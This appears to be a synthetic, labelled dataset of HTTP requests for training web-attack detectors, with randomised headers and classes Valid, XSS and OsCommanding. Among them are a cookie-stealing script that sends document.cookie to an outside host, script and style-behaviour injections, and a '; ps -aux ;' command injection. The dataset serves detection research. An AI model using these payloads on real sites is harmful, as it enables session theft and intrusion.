Warning: 932 www.wwas6l.css "3kbciaaakjefi5ciec" "Tue, 30 May 06 18:44:25 CET"
X-Forwarded-For: 235.34.139.147
X-Serial-Number: 544350626543951868
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 48964
Start - Id: 16116
class: Valid
GET /aDo@/gQmqWQ9/LandNt/acti/o5lbh/rRdKilYJK5eDwat5Lf/aJH.shtml?iahtizEi2znoieg=EBw6in&jV2E=ntb&ttsm=36193960&%uh4A2=xeii&hiieestp=8504&SpB0kL-bK@KH=6726702&ntYT=xmleYgwvZashutdownP&Meabrjesaeal2u=ihobhn&8oighl9t1ooOl=%5Dqdq&uyymcmese=olenaeNmnne&9oaHdoCh=+itoi6bn&Oh=kewp-t2e%7Ecjd%7E HTTP/1.1
Host: www.ifac4c.ch:80
Connection: close
Accept: video/*;q=0.7
Accept-Charset: isiri-3342;q=0.4, macintosh;q=0.4
Accept-Encoding: *
Accept-Language: *;q=0.6
Cache-Control: no-cache
Client-ip: 204.40.193.158
Cookie: cpsdh5Ngtnc=8gst;bJ5C5=86911;xmnU5s8ath=73htna f
Cookie2: $Version="41"
Date: Mon, 12 Jan 04 08:50:35 GMT
ETag: W/"yrQ4gTNtBvCNClM"
Expect: 100-continue
From: c2a1pa@8itiJl.de
If-Modified-Since: Wed, 02 Jun 04 04:14:05 GMT
If-Unmodified-Since: Sat, 08 Jan 05 17:26:49 GMT
If-Match: "solqwvUTZj_FDTh96"
If-None-Match: *
If-Range: *
Max-Forwards: 09
MIME-Version: 8.0
Pragma: EDmi='LRpn'
Proxy-Authorization: Digest uri=/ttihrsz/Tptn/rLV8/veluwm.js
Authorization: Digest algorithm=xttee
Range: 303812-992,8-0,-1
Referer: http://3mmaten.org/nl1y9d.tiff
TE: gzip;q=0.4,trailers,chunked;q=0.4
Trailer: Proxy-Authorization
User-Agent: onahtxeoal
UA-CPU: MIPS
UA-Disp: 235,1889,16
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 4140x4561
Via: tsiwo/9.8 www.Jned.html, 8.3 94.162.120.103:449
Transfer-Encoding: deflate
Upgrade: ro1tlo/3.6, tuh/6.6
Warning: 964 221.114.71.110:2492 "9tmf4asphah" 
X-Forwarded-For: 44.155.173.100
X-Serial-Number: 6495346475
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16116
Start - Id: 24072
class: Valid
GET /ssrleo1zs6yomS/tnisna/0o22vrCs/hVwdZ9cofIk-Sr55R04.nsf?qio=hEyeaero&UAIftpWjomochaI5d=naun HTTP/1.1
Host: www.3fes.net:300
Connection: keep-alive
Accept: video/*;q=0.4, image/png;q=0.4, video/*;q=0.9
Accept-Charset: *;q=0.5
Accept-Encoding: gzip;q=0.9, gzip, compress, gzip;q=0.3, gzip
Accept-Language: *;q=0.9
Cache-Control: min-fresh=1819
Client-ip: 88.109.68.91
Cookie: nwlwtivowtrot=9331096932
Cookie2: $Version="8"
Date: Sat, 04 Mar 06 20:01:28 UTC
ETag: "ks.MSGkt2PeCjv6nnyx"
Expect: 100-continue
From: f0sra@9ueh6gfjNk.uk
If-Modified-Since: Mon, 06 Apr 09 02:36:02 CET
If-Unmodified-Since: Sat, 12 Aug 06 07:57:23 UTC
If-Match: "KOd-8jipe4auVGr4Ngo_"
If-None-Match: "aAO-35peVdu3KVB"
If-Range: Wed, 28 Mar 07 08:11:57 CET
Max-Forwards: 13
MIME-Version: 8.4
Pragma: bs='ebi'
Proxy-Authorization: NTLM dWw5ZWJpbTJydHJ0dGZpSm9hdGFzdWtubW5JcU51ZWlidkptVXRkZ3V1Nk9pRQ==
Authorization: dthnh9 suegte=otgek
Range: 97098-,8076-,1747-
Referer: http://www.8bHcat.org/unh5efa/oeawzto/qtjOui/ctEhiyn/co7l.dll
TE: trailers,trailers,gzip
Trailer: Accept-Charset
User-Agent: ilBo1pg
UA-CPU: x86
UA-Disp: 176,3441,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 775x0014
Via: 7.9 82.174.202.241, 4.4 www.defn.tiff, FTP/0.8 www.rspw4e.png:53153
Transfer-Encoding: intmiu
Upgrade: mexkvt/9.3, jmu/8.9, itee/9.6, hik0q/1.1, fi3/2.5
Warning: 205 199.45.173.96:14 "rotui9h8te" 
X-Forwarded-For: 147.32.251.83
X-Serial-Number: 0084225845225079837
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24072
Start - Id: 28946
class: Valid
GET /g3O_Huq/C@DexechttpsjRUFf/amle/e2L1ObKsap/4g5sw/g0HEW6Be7/nasrnemope/sR5J6WUS9rhmt14Qbd8/vrsQiklurl8ye.jpeg?c2Srajfpni=317355&npp=0Isw&sidr=r+&oiAeuogM5jse9=18&eot0norzy=3ddehkli&zrnetcatI2w-=su%7Enm%3DIavho&7oir2ruoeo=xe+slNehstdin%5By%25EoweTd3&aoslr=8220&ohrh1atdaru=usre- HTTP/1.0
Host: www.inlndc.st
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: iso-8859-7, iso-8859-15, euc-tw;q=0.2, cp-950, big5;q=0.5
Accept-Encoding: *
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 176.166.179.35
Cookie: utN=hNFlvUB
Cookie2: $Version="7"
Date: Tue, 24 Mar 09 02:50:17 GMT
ETag: W/"ZWEtMooWwoGAs1kBGpG"
Expect: 100-continue
From: t9orln@obrekngulw.gov
If-Modified-Since: Wed, 29 Dec 04 16:46:10 UTC
If-Unmodified-Since: Tue, 31 Mar 09 21:11:50 GMT
If-Match: "ItPzroGMBWxgZDaB"
If-None-Match: *
If-Range: Fri, 09 Oct 09 19:23:16 UTC
Max-Forwards: 9
MIME-Version: 4.1
Pragma: no-cache
Proxy-Authorization: Basic c2VUOG9oOTE6Ym5hZm5JMw==
Authorization: Digest username="Egnoz"
Range: 61-3,829861-041284,-446
Referer: /weug/csnii77b/l5fTsxd/1hL9m.msf
TE: gzip
Trailer: User-Agent
User-Agent: r9Y@fgi9 http://www.iooT.st
UA-CPU: MIPS
UA-Disp: 3959,584,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 1053x1221
Via: snerOs/3.2 138.0.167.192, 0.1 www.elYm.jpeg
Transfer-Encoding: compress
Upgrade: 9zTj/4.9, nzwna/5.5, gjydto/4.3, wese/6.3
Warning: 913 174.91.7.44 "xdueAm" 
X-Forwarded-For: 108.24.111.61
X-Serial-Number: 7184697
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 28946
Start - Id: 46648
class: XSS
GET /edrhlaen0nhtlss/snitnudmh/sTXu5lLeHULa/nvzSdAMmo0MS-/lszZXsGnullY.htm?hAtstdinHoR5=reos2do2&iacn=ee2eoaa9wmpwoTW&DjM2OP=p1&eaoet=d&si9Zbrq=Eahle&eaufrnsel=mj8Snyealyv&8s=s5ZlvZ.QXgVH&ntaeynenueshb=cStbtrte%3APsei&_OTutmpXnsock_streammail=qusdeletea&e6hgionFus=z0se&snEheaef=yuf-t+eh8gs4rcpt&ZEw0dS=btss%5Dwrcpr5a&0m2Rnti9=95&sD78fi=5T1H HTTP/1.1
Host: 48.183.226.11:953
Connection: close
Accept: application/rtf
Accept-Charset: *;q=0.7
Accept-Encoding: <object classid  =   "     clsid:...    "    codebase   =    "   javascript:    [document.location.replace   ('http://www.la.com/cgi-bin/gelinigeil.cgi'+document.cookie);] ">
Accept-Language: dn-en;q=0.8, Rtsonri-ololjHak;q=0.8, tle-Tehge;q=0.2, th-QEaxfna;q=0.7, etiiafla-i
Cache-Control: min-fresh=97
Client-ip: 51.95.35.51
Cookie: itrr=al.Jvn;haoohoeOvadmi=7vb7A9hTMQGN
Cookie2: $Version="7"
Date: Sun, 30 Dec 07 10:01:51 GMT
ETag: "nwx9cYxndsF-ju6P"
Expect: 100-continue
From: taeee@rooPt9.cz
If-Modified-Since: Fri, 26 Mar 10 15:34:03 UTC
If-Unmodified-Since: Thu, 04 Jun 09 07:53:55 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 4
MIME-Version: 1.7
Pragma: soNuo='fyfsEcy'
Proxy-Authorization: Basic ZmF1ZWhyQzplZW1zMmNp
Authorization: Basic cmlybThnOmV0aWhlcmNi
Referer: /eebbt/S4yl/ywfle.mp3
TE: deflate;q=0.8,trailers,trailers
Trailer: Referer
User-Agent: bd8ghe/5.3
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 453x024
Via: dst/0.8 159.198.112.133
Transfer-Encoding: identity
Upgrade: tteuU/7.4, wwqwE/2.1, 0ntoi/1.6, teva/9.5, i2imw7/0.1
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 46648
Start - Id: 20404
class: Valid
GET /uir/z.qqe/ath6w/meanoRta10pnmssy/RtHiasme7sre/ah01teydeSDhannf.php3?Prge5aa=l&7odvsttsftqa=jmit&schoh4oihaussl=vSnq6&c_insert3FI=tni9&x9htaccesEvAtmpdNI=%3Castdlmijash&MT0t3Koix=iyTbL_I_NtY&CFKNboot.iniPS9sbeF=5k4eh HTTP/1.0
Host: 177.43.43.6:68406
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: x-mac-arabic;q=0.0, windows-1254;q=0.4, windows-1250;q=0.5, gb2312, iso-2022-jp;q=0.3
Accept-Encoding: identity;q=0.0, identity;q=0.7, identity, compress
Accept-Language: *
Cache-Control: 8Sbavn='paRim'
Client-ip: 229.137.134.223
Cookie: me=aot+Tqau=httpsn
Cookie2: $Version="7"
Date: Sat, 21 Apr 07 05:59:26 CET
ETag: "2J4PZ96E@jbVn6d8"
Expect: 100-continue
From: dordnlun@xidhi.fr
If-Modified-Since: Wed, 17 Dec 08 22:03:09 CET
If-Unmodified-Since: Sat, 11 Oct 08 22:19:47 CET
If-Match: "Xld.VWUrMJcaC7X0"
If-None-Match: "k_S3V9sj6w6Eox__5jv"
If-Range: Fri, 27 Aug 04 07:55:52 GMT
Max-Forwards: 26
MIME-Version: 8.6
Pragma: PfDmstK='uirg'
Proxy-Authorization: Basic clNvM2I6ZTNzYQ==
Authorization: Rretst uqutoSnr=nhAnk3
Range: -21727,-97
Referer: /ibhhwh.cgi
TE: chunked;q=0.5
Trailer: Authorization
User-Agent: Mozilla/8.3 (compatible; MSIE 9.3; Linux i586; CEyd3itRqn)
UA-CPU: 68000
UA-Disp: 767,3451,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 720x338
Via: FTP/5.9 102.189.204.63
Transfer-Encoding: lalxiq; eomtfO=ph9id
Upgrade: otcmsa/8.6, iEye/1.3, dkmh/3.7, otrl/7.1
Warning: 661 www.mldrEo.jpg "sastyHb1estenvw" 
X-Forwarded-For: 92.6.156.80
X-Serial-Number: 9148290691910332501
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20404
Start - Id: 23914
class: Valid
GET /uujin/s.a8D/qNlll7cMDEwHuHt/1ncnoddtnqaabf/erm6s0c9jGSwcbkKQ8c/rK_uGEwjuTREhMRRK.swf? HTTP/1.0
Host: 114.53.180.8
Connection: sl8eyg
Accept: application/*
Accept-Charset: windows-1258;q=0.3, iso-10646-ucs-2;q=0.3, koi8;q=0.4, x-mac-greek
Accept-Encoding: *;q=0.4
Accept-Language: ArnNS-okeae;q=0.5, n7eu-eM;q=0.2, fsr-e
Cache-Control: max-stale
Client-ip: 16.124.33.245
Cookie: hc7qeietaeDsi=okasRALe8c;s0ndeh=76201;_Yf0IB1=4nmee7onaneftotblf
Cookie2: $Version="1"
Date: Mon, 05 Apr 04 04:16:35 CET
ETag: "ul6z@rBPwtNK2TcY1"
Expect: l9rgded=egntpm;osnEt2rs
From: hynlj@agsios.uk
If-Modified-Since: Fri, 13 Mar 09 02:31:36 UTC
If-Unmodified-Since: Sun, 25 Feb 07 07:47:55 UTC
If-Match: *
If-None-Match: *
If-Range: Sat, 01 Jul 06 20:20:52 CET
Max-Forwards: 780
MIME-Version: 0.8
Pragma: at=fhonoeh
Proxy-Authorization: rhQ37c dedaas2=hnaO
Authorization: Digest algorithm=MD5
Range: 079760-,794-,2-30
Referer: http://emIeosl.gov/rk6hp6/trmu/oaS0new.bin
TE: gzip
Trailer: Expect
User-Agent: eOnpoH http://www.uetc.org
UA-CPU: Sparc
UA-Disp: 722,7012,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 7253x9892
Via: 8.1 155.255.212.31, 7.3 206.113.67.79, FTP/5.2 www.j1wyb2ct.jpg
Transfer-Encoding: compress
Upgrade: tehni/0.9, Cea4fl/2.0, ztoh/4.3, pe6/2.9, ad9/9.3
Warning: 941 www.oEhntdsr.htm "tUs5csE0e0rt17tgQw6" 
X-Forwarded-For: 59.99.49.22
X-Serial-Number: 383867
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 23914
Start - Id: 5295
class: Valid
POST /sGrI./chaving@H3/noa6b5n509WimyYNmYP/omiiA/.CN9tCw_b._b-/spu6a/aDLm..jpg? HTTP/1.0
Content-Length: 135
Content-Language: sq,tc5c
Content-Encoding: gzip
Content-Location: /nxth4teb/8uaVcr/m1eooii/kejd.pdf
Content-MD5: Y3J1ZWFvTWRjYW5UYXNpRQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 30 Jul 05 14:18:07 GMT
Last-Modified: Wed, 07 Jun 06 08:27:40 CET
Host: www.le3g8.com:60472
Connection: keep-alive
Accept: */*
Accept-Charset: euc-jp, x-mac-korean, x-mac-turkish, x-mac-greek
Accept-Encoding: deflate, gzip, deflate
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 36.133.99.23
Cookie: c80bomee2e=qertsieni;vXl7leD=32
Cookie2: $Version="4"
Date: Mon, 19 May 08 05:32:27 UTC
ETag: "hVxHsrYAQqM_e7KE28G"
Expect: enfl
From: rpfz@tmadFbssh.cz
If-Modified-Since: Sat, 07 Apr 07 16:41:38 UTC
If-Unmodified-Since: Fri, 23 Nov 07 09:57:25 CET
If-Match: *
If-None-Match: "HueST2uNq7u2Ijzf0fzh"
If-Range: "eByZX_Z2VV@Hxop.KP"
Max-Forwards: 9
MIME-Version: 5.3
Pragma: no-cache
Proxy-Authorization: fbsyd htuo=tbv9k
Authorization: Digest uri=/tLaddkhi/thnbne6a/g3soaid/gtpfyc.msf
Range: 44-,39-,850121-
Referer: http://www.oIowohd.biz/eg4r/kilUnzwh/ntgt/eetds.nsf
TE: deflate
Trailer: If-None-Match
User-Agent: zqWB4e http://www.sHpuo.biz
UA-CPU: PowerPC
UA-Disp: 507,781,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 1146x7241
Via: foDh/5.0 144.111.49.234, 6.9 www.oAcommw.css, 2.4 117.9.202.54
Transfer-Encoding: compress
Upgrade: tXHeow/7.4, 6oe/7.0, mrhnae/8.2
Warning: 155 41.32.226.111 "u6eteeEntposrsoPm" "Sat, 31 Jul 04 05:15:59 CET"
X-Forwarded-For: 86.174.5.96
X-Serial-Number: 6090087986849
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~

nt=29918&fiotditaeAb5ieo=siM-t&AEuxBKoidbMk0=37467702&Mg_K=26847266&bodyb_.=hmkn&tzhSmcexec3E=nd&tllerOMs=i4fwV3n-LM&tede=so imgceoaeur

End - Id: 5295
Start - Id: 32161
class: Valid
GET /rSRaDy37OEYK7Y9a6bi/s2d2cP/4l0/am/SrmsjphpnB6qEk/TdulAO/peeadadI/7eVwYNrbr/rZ.Ua1m2Cb/j4S2xa7.js?d4y=24097&rl2ourrnhi=iIfgeeestttThun&ad=a.uqlvniC&oln=596&dnaHte09reaEa=2561&sa=799792059&3ioeudpebuCddeb=euLcbredhJj&teiaes=3&i7Vmna=2616206141&newrsahsIeT6=ce%24tsjpasswdrw&cif9hinrn=xa%2Bo5mxBDa&dQXb-Xeval0J.a=30%40juL&thleT2eo=i30eiw%25ulie0dI&qe6sle8ii=jusrbAbl1 HTTP/1.0
Host: www.toxztshn7r.it:80
Connection: steltS
Accept: image/*;q=0.6, image/gif;q=0.0, application/rtf
Accept-Charset: cp-950;q=0.3
Accept-Encoding: *;q=0.4
Accept-Language: tises-O;q=0.6, e9-M;q=0.0
Cache-Control: max-age=0
Client-ip: 166.211.23.154
Cookie: neonsx5i3heaet=fsidn
Cookie2: $Version="79"
Date: Fri, 21 Sep 07 06:15:34 GMT
ETag: "qd-Ko9LoIq2ZVIYAhXwI"
Expect: 100-continue
From: nysnc@tRhdi.ch
If-Modified-Since: Wed, 12 Apr 06 03:25:36 GMT
If-Unmodified-Since: Thu, 03 May 07 23:29:36 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 9
MIME-Version: 9.2
Pragma: no-cache
Proxy-Authorization: Digest nc=3A5E1cB7
Authorization: Basic cmFkcDpFdmF1YWJkbw==
Range: 55063-6304,280-5,006-574457
Referer: http://xbs4oota.st/el2r/qhefne/pYfthoga/50i5eter/wrosrx.pdf
TE: chunked
Trailer: Referer
User-Agent: Mozilla/9.2 (Windows; U; Win98 3.8; 1r-Tw; rv:0.4.6) Gecko/81310669
UA-CPU: Sparc
UA-Disp: 3488,5746,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 320x815
Via: 3.2 www.sv9h.jpeg, 1.3 www.turntlr.jpg:900
Transfer-Encoding: identity
Upgrade: arx0t/5.9, nloymn/5.4
Warning: 953 85.108.253.61 "sa7gxeiapkth" 
X-Forwarded-For: 71.26.127.147
X-Serial-Number: 30016266128
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 32161
Start - Id: 2603
class: Valid
GET /ruAkqO5ftO/a6sRCn_@1YnYhaC/xGI9NN/9S/1_m6cOnk11ZaHNvQ/thasiatiyyo/oue.bin?.0t1tif=iframerdid&hheailsiyf=9&econrattymrweni=9192&tOu1hohnfqrCet=483979043&-egform3Ry=zyosWotwtC8raDo2&uc1nyy6ncA=52&lmezithSo=af%5Di5%26nem+&gGdivc1fb.9Du=l HTTP/1.1
Host: 126.128.5.149:80
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: *;q=0.3
Accept-Language: one2rh-nne, tnOe-imtOdnd, Olee3fb-i;q=0.4, onOitsie-n
Cache-Control: max-age=71855
Client-ip: 11.225.10.199
Cookie: tRfOtkm3pn=2099907344;5OEr=sa;8.hKwjKKwgN5=3tdr;aN8ruttw=mUvIJy;c74=75734067
Cookie2: $Version="2"
Date: Thu, 14 Dec 06 08:27:39 UTC
ETag: W/"Odn1fMbYERnDz3JfNZL"
Expect: stixncs
From: ctew@aidI.be
If-Modified-Since: Mon, 17 Apr 06 23:39:37 GMT
If-Unmodified-Since: Sat, 18 Oct 08 11:55:20 GMT
If-Match: *
If-None-Match: *
If-Range: "31DK_Ef5u7-M2R5O4"
Max-Forwards: 029
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: Basic YXpvaG1uOmRualRveDU=
Authorization: slEt dtcveeSm=keeh
Range: 358055-4261
Referer: /lhezo/mhisrOe/uts5nT.mpeg
TE: trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/6.6 (Machintosh; U; PPC Mac OS X 2.8; 15-hn; rv:3.6.6) Gecko/54210338
UA-CPU: PowerPC
UA-Disp: 5183,3355,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 6037x127
Via: 7.9 www.ehgta5.jpeg:315, FTP/3.1 238.211.53.109
Transfer-Encoding: compress
Upgrade: hutie/7.1
Warning: 139 202.175.202.238:09 "if85tEa" "Sun, 03 Sep 06 18:25:51 GMT"
X-Forwarded-For: 111.117.154.17
X-Serial-Number: 9671188655936
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2603
Start - Id: 43110
class: OsCommanding
GET /hus/bleenWtzsih/uh7lteiniea8se/e6sytZfvEe.jpeg?esht8Ete5rulotr=between%7Ezen&EdfH761=%27+++++%3B+ps+-aux+++%3B&ttijTiiu=i9NlPOE HTTP/1.0
Host: 134.113.140.95
Connection: owehm
Accept: application/x-tar;q=0.2
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: ia='hiI'
Client-ip: 7.211.178.253
Cookie: itisEbtohe=iBX9fbNh@m
Cookie2: $Version="389"
Date: Thu, 17 Jun 04 12:00:52 CET
ETag: W/"9wZw3Jb-qMU@6bdJjjgN"
Expect: eNyuA=ansia;nfrWso
From: 5aEtd@kfeetndtk6.de
If-Modified-Since: Wed, 22 Sep 04 07:10:36 GMT
If-Unmodified-Since: Mon, 30 Aug 04 05:38:48 GMT
If-Match: "mxBP9BG8Ob6JSSZId"
If-None-Match: *
If-Range: *
Max-Forwards: 331
MIME-Version: 1.4
Pragma: ss='gh'
Proxy-Authorization: NTLM dHNudGs5YWFpZGVvb2hueTZxbWVocmw4VUlTaXRoZ2F1bmlyVHNIdDlSZlVwaW9l
Authorization: Basic b3d0aG5laDppcmV1
Referer: /na3beona/pihcnn2/eseods.dll
TE: deflate;q=0.7
Trailer: Connection
User-Agent: SnT7en3b8ptsidnkow
UA-CPU: StrongARM
UA-Disp: 046,4473,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 603x2268
Via: 0.2 109.181.244.123, FTP/7.5 www.alkrieh.html
Transfer-Encoding: gzip
Upgrade: Fgohbd/4.1
Warning: 117 www.nI2s.jpeg "duaiiS2" 
X-Forwarded-For: 204.73.145.24
X-Serial-Number: 306986025864028
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43110
Start - Id: 46719
class: XSS
GET /dgob3abtyaf3A/eNu@RjrPPgZmNT1-fVc.pl?9ZKHxp_=wirr&rsLxi59irh4i=run%40anltrtn&ecpG2us3i=havingtn%7E0a&yktebtlhshs=rswn&dmekan88rn8te=ntete&tBesoqrHsd9=oSPVpn7F HTTP/1.0
Host: www.esghntTess.fr:80
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-cache
Client-ip: 96.118.112.51
Cookie: iframeDQ43htmpy=ea2b;zgxvspslod=099;9cscescynaaeita=3384418;r5il2= i;irhmaintht=<div     style  =    "     behaviour: url([http://www.an.com/script/mZa.asmx]);    "   >
Cookie2: $Version="55"
Date: Tue, 23 Aug 05 14:13:05 GMT
ETag: W/"0d8_3YwJZ6x_bpH"
Expect: 100-continue
From: anere9f@oidevoD.uk
If-Modified-Since: Sun, 07 May 06 04:10:49 CET
If-Unmodified-Since: Wed, 01 Jun 05 05:15:50 GMT
If-Match: "Yb@qAy8XZmB9SmV"
If-None-Match: "6i0tQ.MMokClUqaTnz"
If-Range: "a1srNILzXsFQwu-1"
Max-Forwards: 834
MIME-Version: 5.4
Pragma: 3fectr='nr1oR'
Proxy-Authorization: Basic TmU4YTp2a0FvNm0=
Authorization: s0th lftatyel=nare
Range: -4,-90,-87939
Referer: /nrud7h3l/ztxfn1l/ufgjdral/ut6sai/a6an.jsp
TE: trailers,trailers
Trailer: User-Agent
User-Agent: sq1aVcMF http://www.mjssfga.cz
UA-Disp: 365,342,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 040x726
Via: FTP/1.7 www.rodiBe.png, HTTP/8.0 80.99.147.250, FTP/3.3 101.96.140.22:15671
Transfer-Encoding: compress
Upgrade: cips/9.2, sovfy/0.4, Tuweh/3.9, dzd/8.5, do6/5.7
Warning: 173 143.169.118.167 "zsbnlyqean" "Tue, 04 Sep 07 08:19:57 UTC"
X-Forwarded-For: 166.176.57.0
X-Serial-Number: 15071765483594202
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46719
Start - Id: 6883
class: Valid
POST /soRfMWfhr/nodr9ier6Dereid/8d5somacis2wcckhy/at2b.js? HTTP/1.1
Content-Length: 286
Content-Language: eewd
Content-Encoding: compress
Content-Location: http://Ioe3.net/oneqjn.avi
Content-MD5: c3Jsc0VFaWFtc2VpaWRvZg==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 09 Apr 09 03:36:01 GMT
Last-Modified: Wed, 13 Jul 05 23:54:42 CET
Host: 15.48.92.44:80
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: *
Accept-Encoding: 
Accept-Language: ehzria-iui, ese9-S7aurl8, ohutetn-nlp;q=0.2
Cache-Control: nl=ssofEir
Client-ip: 36.160.70.16
Cookie: la=343357;hsnimtax=er6iaq
Cookie2: $Version="18"
Date: Tue, 04 Mar 08 16:24:18 GMT
ETag: "AR_t4pvKsG9QSCYlj"
Expect: onEoapn4=rlrg5;xate=bhaeer
From: 1m1ll@ibidpns.org
If-Modified-Since: Thu, 22 Jun 06 24:35:48 UTC
If-Unmodified-Since: Tue, 13 Jun 06 21:53:55 UTC
If-Match: "zg6GpZ@VPXgLdTr"
If-None-Match: "Ld6F7E4WT8UwP6zBR3W"
If-Range: "qWjX3XzBU_B_TFqdF"
Max-Forwards: 1
MIME-Version: 1.0
Pragma: no-cache
Proxy-Authorization: Digest uri=http://nsa5.net/jIlhTi.rar
Authorization: Digest nonce
Range: -93,35-
Referer: http://8eo4an.uk/sgebu/snan/ynhie/ihooi.dll
TE: trailers
Trailer: If-Unmodified-Since
User-Agent: tei4td/6.2
UA-CPU: x86
UA-Disp: 7188,784,16
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 496x5279
Via: FTP/6.2 80.53.61.252:44, FTP/7.8 www.oat2.js
Transfer-Encoding: r8oh
Upgrade: pePaai/6.4, heot/7.3
Warning: 207 www.7yee.shtml "rotcrNusEy3ganeoytl" "Mon, 04 Feb 08 07:34:03 GMT"
X-Forwarded-For: 230.208.82.135
X-Serial-Number: 65434343667649
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

hrbciRixdedhtsy=usdmxbsadcog&lrbaayesogneyh5=6in4ix&gldyhcgjcue=niaiGrer&r4r=ijeqedss8vp&link8IzU@d=8&Yn=5488202&gadleLv6aeeoax=e;g&nSNrixbqservicesSJ=whti+~ebgsoundsynsselectchildc0iiy+&euwr1eyuht=en  ct?) vntastd&meiryb=2171028&GC3u3YOb=nsc2ecTeb&waetwfaaysettr=4961663075

End - Id: 6883
Start - Id: 47263
class: XSS
GET /56t/l6/pvNvhliRc_q2e_/riihl7qoA6/cd/hbFeiei9veetnneotsr/3.@MnodeidTobject4sFQe/nFIb-/imgkqGVmochaEVsam/toEhdOe/e4/jtdsxrasdoeiavoda.php?4Ts=%3Cscript%3Ealert%28lilritw.eeiwA%29%3C%2Fscript++%3E HTTP/1.1
Host: 202.231.7.135
Connection: close
Accept: application/*;q=0.7, text/*
Accept-Charset: windows-1257, iso-8859-9;q=0.3, x-mac-roman;q=0.2, euc-tw, utf-8;q=0.8
Accept-Encoding: 
Accept-Language: ar5tec-t5d, ld8al9ku-aPrmimS, ee-6niiA;q=0.5, ivNi-o, 8cb-taipe
Cache-Control: no-cache
Client-ip: 10.37.184.28
Cookie: rI=:hediryOtue:;phy=eb20ebrlecme;95aontwk=sallediao2lcort;reu=nEft6i5;ncargntu=0670721;uLFx6S6BX=mtn
Cookie2: $Version="0"
Date: Wed, 05 Apr 06 17:11:33 CET
ETag: W/"23jIscF3AhyqY.WJB"
Expect: oNatKe
From: mP8eatM@krgt.fr
If-Modified-Since: Tue, 11 Sep 07 15:28:44 GMT
If-Unmodified-Since: Sun, 24 Jan 10 03:34:57 UTC
If-Match: *
If-None-Match: *
If-Range: Thu, 04 Mar 10 12:02:16 UTC
Max-Forwards: 5303
MIME-Version: 3.6
Pragma: to='ssotuehe'
Proxy-Authorization: 6ndit medexEq=belmLsj
Authorization: Basic b2VucTc6aWhlZm5Fbg==
Range: -1,528-520677
Referer: http://3rn4.org/ebdmniho.asp
TE: deflate,trailers,deflate;q=0.4
Trailer: Warning
User-Agent: dHmikotkE (ei@lbOz; ek8M0Yj; aKmg3-; enHbYe22; nASZVA)
UA-CPU: Sparc
UA-Disp: 5931,8389,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 753x7661
Via: 0.7 125.121.45.193:770, 3.5 109.149.185.124
Transfer-Encoding: deflate
Upgrade: 2gkxie/3.5, ehnI/4.4
Warning: 816 www.tnnynhia.jpg:19076 "wwNrihTcIteeag" "Sat, 20 Oct 07 01:41:20 GMT"
X-Forwarded-For: 228.59.131.84
X-Serial-Number: 15152704800
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47263
Start - Id: 4626
class: Valid
POST /SX-C/nWFYRJKAukXD.js? HTTP/1.1
Content-Length: 256
Content-Language: rxTi2te,wt,AorsAean
Content-Encoding: gzip
Content-Location: http://www.aheto.be/gDeixq.php4
Content-MD5: ZWVyYWFzQWl0aW1oZmVuNQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 19 Feb 07 24:06:24 UTC
Last-Modified: Mon, 07 Jan 08 06:13:48 CET
Host: 247.3.90.93
Connection: laedzm
Accept: image/*;q=0.2, text/xml, video/*;q=0.2
Accept-Charset: koi8, iso-8859-7, iso-8859-6, big5;q=0.6
Accept-Encoding: identity, compress;q=0.1, gzip;q=0.8, deflate, deflate
Accept-Language: *
Cache-Control: no-cache
Client-ip: 163.169.220.127
Cookie: delete@gI=ksttsrcpih)$zpRI;ht0se=0wehoi7sbcjada6mb
Cookie2: $Version="2"
Date: Sat, 24 Oct 09 18:00:14 CET
